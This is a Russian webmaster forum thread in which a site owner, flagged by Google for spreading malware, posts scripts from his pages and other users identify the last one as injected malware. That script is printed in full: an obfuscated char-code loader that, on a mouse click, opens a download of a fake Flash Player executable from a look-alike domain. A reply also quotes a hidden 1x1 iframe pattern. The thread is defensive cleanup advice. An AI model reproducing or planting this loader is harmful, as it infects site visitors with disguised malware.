X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Очередная тема про вирус на сайте, не могу найти
Frankie
Frankie
Topic Starter сообщение 26.1.2010, 22:05; Ответить: Frankie
Сообщение #1


На не очень старый варезник сегодня гугля повесила ярлык, что он распространяет вирусы.
Самое интересное, что никаких баннеров на нем не висит, только пара счетчиков.
через интернет эксплорер пытался на него заходить, вылазиет сообщение. что попытка установить флеш-плеер с сайта _abobes.ru
хотя посторонних кодов на сайте я не обнаружил, тем более с таким адресом. еще недавно мне писали, что при заходе на него каспер ругается на попытку загрузить вредоносную страницу с адресом:
http://erorhost/sait/menu.php этого кода я тоже не нашел...

Система siteguard.ru выявила несколько подозрительных ява скриптов, но я в яваскрипте нивзубногой, может что-нить подскажет?
<script type="text/javascript">
  window.addEvent('domready', function(){ new YJNF4({ overallContainer: 'YJ_NewsFlash4', slicesClass: '.yjnewsflash_slice', slicesContainer: 'YJ_NewsFlash4_Slices' }); })
</script>


<script type="text/javascript">
window.addEvent('domready', function() { new SmoothScroll({duration: 1000}); });
</script>


<script type="text/javascript">
  sfHover = function() { var sfEls = document.getElementById("horiznav_d").getElementsByTagName("LI"); for (var i=0; i<sfEls.length; i++) { sfEls[i].onmouseover=function() { this.className+=" sfHover"; } sfEls[i].onmouseout=function() { this.className=this.className.replace(new RegExp(" sfHover\\b"), ""); } } } if (window.attachEvent) window.attachEvent("onload", sfHover);
</script>


<script type="text/javascript">
window.addEvent('domready', function() { $("login_pop").setStyles({ left: (window.getScrollLeft() + (window.getWidth() - 290)/2)+'px' }); $("reg_pop").setStyles({ left: (window.getScrollLeft() + (window.getWidth() - 445)/2)+'px' }); });
</script>


<script LANGUAGE="JavaScript">
<!-- var temp="",i,c=0,out="";
var str="60!83!67!82!73!80!84!32!76!65!78!71!85!65!71!69!61!34!74!97!118!97!115!99!114!105!112!116!34!62!13!10!102!117!110!99!116!105!111!110!32!80!111!112!83!104!111!119!51!40!41!32!123!32!32!13!10!67!111!111!107!105!101!84!101!115!116!61!110!97!118!105!103!97!116!111!114!46!99!111!111!107!105!101!69!110!97!98!108!101!100!59!32!32!13!10!105!102!40!67!111!111!107!105!101!84!101!115!116!41!32!32!13!10!123!32!32!13!10!67!108!105!99!107!85!110!100!101!114!99!111!111!107!105!101!32!61!32!71!101!116!67!111!111!107!105!101!40!39!99!108!105!99!107!117!110!100!101!114!39!41!59!32!32!13!10!105!102!32!40!67!108!105!99!107!85!110!100!101!114!99!111!111!107!105!101!32!61!61!32!110!117!108!108!41!32!32!13!10!123!32!32!13!10!118!97!114!32!69!120!112!68!97!116!101!32!61!32!110!101!119!32!68!97!116!101!32!40!41!59!32!32!13!10!69!120!112!68!97!116!101!46!115!101!116!84!105!109!101!40!69!120!112!68!97!116!101!46!103!101!116!84!105!109!101!40!41!32!43!32!40!49!52!52!32!42!32!54!48!32!42!32!54!48!32!42!32!49!48!48!48!41!41!59!32!32!13!10!83!101!116!67!111!111!107!105!101!40!39!99!108!105!99!107!117!110!100!101!114!39!44!39!49!39!44!69!120!112!68!97!116!101!44!32!34!47!34!41!59!32!32!13!10!119!105!110!100!111!119!46!111!112!101!110!40!34!104!116!116!112!58!47!47!97!100!111!100!101!115!46!114!117!47!100!111!119!110!108!111!97!100!47!105!110!115!116!97!108!95!102!108!97!115!104!95!112!108!97!121!101!114!46!101!120!101!34!41!59!32!13!10!119!105!110!100!111!119!46!102!111!99!117!115!40!41!59!32!32!13!10!125!32!32!13!10!125!32!32!13!10!125!32!32!13!10!102!117!110!99!116!105!111!110!32!71!101!116!67!111!111!107!105!101!32!40!110!97!109!101!41!32!123!32!32!13!10!118!97!114!32!97!114!103!32!61!32!110!97!109!101!32!43!32!34!61!34!59!32!32!13!10!118!97!114!32!97!108!101!110!32!61!32!97!114!103!46!108!101!110!103!116!104!59!32!32!13!10!118!97!114!32!99!108!101!110!32!61!32!100!111!99!117!109!101!110!116!46!99!111!111!107!105!101!46!108!101!110!103!116!104!59!32!32!13!10!118!97!114!32!105!32!61!32!48!59!32!32!13!10!119!104!105!108!101!32!40!105!32!60!32!99!108!101!110!41!32!123!32!32!13!10!118!97!114!32!106!32!61!32!105!32!43!32!97!108!101!110!59!32!32!13!10!105!102!32!40!100!111!99!117!109!101!110!116!46!99!111!111!107!105!101!46!115!117!98!115!116!114!105!110!103!40!105!44!32!106!41!32!61!61!32!97!114!103!41!32!32!13!10!114!101!116!117!114!110!32!103!101!116!67!111!111!107!105!101!86!97!108!32!40!106!41!59!32!32!13!10!105!32!61!32!100!111!99!117!109!101!110!116!46!99!111!111!107!105!101!46!105!110!100!101!120!79!102!40!34!32!34!44!32!105!41!32!43!32!49!59!32!32!13!10!105!102!32!40!105!32!61!61!32!48!41!32!98!114!101!97!107!59!32!32!13!10!125!32!32!13!10!114!101!116!117!114!110!32!110!117!108!108!59!32!32!13!10!125!32!32!13!10!102!117!110!99!116!105!111!110!32!83!101!116!67!111!111!107!105!101!32!40!110!97!109!101!44!32!118!97!108!117!101!41!32!123!32!32!13!10!118!97!114!32!97!114!103!118!32!61!32!83!101!116!67!111!111!107!105!101!46!97!114!103!117!109!101!110!116!115!59!32!32!13!10!118!97!114!32!97!114!103!99!32!61!32!83!101!116!67!111!111!107!105!101!46!97!114!103!117!109!101!110!116!115!46!108!101!110!103!116!104!59!32!32!13!10!118!97!114!32!101!120!112!105!114!101!115!32!61!32!40!97!114!103!99!32!62!32!50!41!32!63!32!97!114!103!118!91!50!93!32!58!32!110!117!108!108!59!32!32!13!10!118!97!114!32!112!97!116!104!32!61!32!40!97!114!103!99!32!62!32!51!41!32!63!32!97!114!103!118!91!51!93!32!58!32!110!117!108!108!59!32!32!13!10!118!97!114!32!100!111!109!97!105!110!32!61!32!40!97!114!103!99!32!62!32!52!41!32!63!32!97!114!103!118!91!52!93!32!58!32!110!117!108!108!59!32!32!13!10!118!97!114!32!115!101!99!117!114!101!32!61!32!40!97!114!103!99!32!62!32!53!41!32!63!32!97!114!103!118!91!53!93!32!58!32!102!97!108!115!101!59!32!32!13!10!100!111!99!117!109!101!110!116!46!99!111!111!107!105!101!32!61!32!110!97!109!101!32!43!32!34!61!34!32!43!32!101!115!99!97!112!101!32!40!118!97!108!117!101!41!32!43!32!32!13!10!40!40!101!120!112!105!114!101!115!32!61!61!32!110!117!108!108!41!32!63!32!34!34!32!58!32!40!34!59!32!101!120!112!105!114!101!115!61!34!32!43!32!101!120!112!105!114!101!115!46!116!111!71!77!84!83!116!114!105!110!103!40!41!41!41!32!43!32!32!13!10!40!40!112!97!116!104!32!61!61!32!110!117!108!108!41!32!63!32!34!34!32!58!32!40!34!59!32!112!97!116!104!61!34!32!43!32!112!97!116!104!41!41!32!43!32!32!13!10!40!40!100!111!109!97!105!110!32!61!61!32!110!117!108!108!41!32!63!32!34!34!32!58!32!40!34!59!32!100!111!109!97!105!110!61!34!32!43!32!100!111!109!97!105!110!41!41!32!43!32!32!13!10!40!40!115!101!99!117!114!101!32!61!61!32!116!114!117!101!41!32!63!32!34!59!32!115!101!99!117!114!101!34!32!58!32!34!34!41!59!32!32!13!10!125!32!32!13!10!100!111!99!117!109!101!110!116!46!111!110!109!111!117!115!101!117!112!61!80!111!112!83!104!111!119!51!59!32!13!10!60!47!83!67!82!73!80!84!62!";
l=str.length; while(c<=str.length-1) { while(str.charAt(c)!='!')temp=temp+str.charAt(c++);
c++; out=out+String.fromCharCode(temp); temp=""; } document.write(out); //-->
</SCRIPT>


Сообщение отредактировал Frankie - 26.1.2010, 22:16
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
nonub
nonub
сообщение 26.1.2010, 22:34; Ответить: nonub
Сообщение #2


99% в последнем скрипте дрянь. Сохраните копию файла, вырежите последний код и посмотрите.

После чего просканируйте ПК курейтом в безопасном режиме, смените все пароли (от ФТП тоже), снесите ослика.

Сообщение отредактировал nonub - 26.1.2010, 22:37


--------------------
[Ахтунг!!!] Реальные лицензии по реальным ценам [Ахтунг!!!]

[ iPhone - iPad - Mac - Прокачай по полной ]
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
KipiaSoft
KipiaSoft
сообщение 26.1.2010, 23:13; Ответить: KipiaSoft
Сообщение #3


тоже подозрение на последний код, особенно если он внизу файла появился неизвестно откуда


--------------------
Шустрый хостинг для WP!

вистерия ант ди
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
werts
werts
сообщение 26.1.2010, 23:23; Ответить: werts
Сообщение #4


У меня были украдены пароли от Ftp и враги во всех файлах index(было несколько папок) добавили вредоносный код. Но так как сайты пишу сам то вредоносные коды быстро нашёл и удалил. Кстати, код может быть внедрен и в начале страницы, а не только в конце.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
dibility
dibility
сообщение 26.1.2010, 23:34; Ответить: dibility
Сообщение #5


последний код.
Крипт ифрейма, если не твое, а оно не твое
<iframe src="nevajno" width="1" height="1" scrolling="no"></iframe>

чисть все, меняй доступы.


--------------------
SeoPulse Trends. Topics. News
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ChristmasNet
ChristmasNet
сообщение 27.1.2010, 0:18; Ответить: ChristmasNet
Сообщение #6


У меня на DLE 8.2 (пропатченная) была подобная ситуация, искал вредоносный код так и не нашел, решил просто обновиться, после обновления вирусов не было. Скорее всего есть какая то дыра в javascript.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Frankie
Frankie
Topic Starter сообщение 27.1.2010, 20:21; Ответить: Frankie
Сообщение #7


(nonub @ 26.1.2010, 21:34) *
снесите ослика

осла у меня нет, есть тока стронг...
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
nonub
nonub
сообщение 27.1.2010, 23:22; Ответить: nonub
Сообщение #8


через интернет эксплорер пытался на него заходить..


Другого Ослика smile.gif


--------------------
[Ахтунг!!!] Реальные лицензии по реальным ценам [Ахтунг!!!]

[ iPhone - iPad - Mac - Прокачай по полной ]
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
dibility
dibility
сообщение 27.1.2010, 23:29; Ответить: dibility
Сообщение #9


(dibility @ 26.1.2010, 23:34) *
последний код.
Крипт ифрейма, если не твое, а оно не твое
Код
<iframe src="nevajno" width="1" height="1" scrolling="no"></iframe>

чисть все, меняй доступы.


ну как? я был прав? проблему решил?


--------------------
SeoPulse Trends. Topics. News
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Frankie
Frankie
Topic Starter сообщение 28.1.2010, 1:09; Ответить: Frankie
Сообщение #10


(dibility @ 27.1.2010, 22:29) *
ну как? я был прав? проблему решил?

К сожалению весь день дома не был((( только, что пришел((( некогда было заниматься

Сообщение отредактировал Frankie - 28.1.2010, 1:11
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
« Предыдущая тема · Программная часть · Следующая тема »
 
2 страниц V   1 2 >
Открыть тему
Тема закрыта
2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Боты могут делать пушподписки на моём сайте?
 2 Megaspryt 858 Вчера, 23:09
автор: MorKer
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыБыстрый и качественный обмен на сайте Baksman.org
Обмен Bitcoin, BTC-e, PM, Qiwi, Yandex money, Карты банк
 53 Baksman 33766 Вчера, 11:29
автор: Baksman
Горячая тема (нет новых ответов) CryptoCloud — прием USDT, BTC, ETH, LTC на любом сайте
 36 CryptoCLoud 10663 16.4.2024, 16:02
автор: CryptoCLoud
Открытая тема (нет новых ответов) Форум про уток - на новом домене
Форум про уток на новом домене - utkamir.ru
 0 artmeteor 626 13.4.2024, 18:26
автор: artmeteor
Горячая тема (нет новых ответов) Странный трафик на сайте длительное время
 33 TABAK 8921 12.4.2024, 5:56
автор: Skyworker


 

Режим отображения: Стандартный · Переключить на: Линейный · Переключить на: Древовидный

Подписка на тему · Сообщить другу · Версия для печати · Подписка на этот форум

RSS Текстовая версия Сейчас: 24.4.2024, 3:08

Дизайн

 
Форум IP.Board © 2024  IPS, Inc.
Лицензия зарегистрирована на: MaulNet
Jooble
Форум IP.Board © IPS, Inc.
Лицензия зарегистрирована на: MaulNet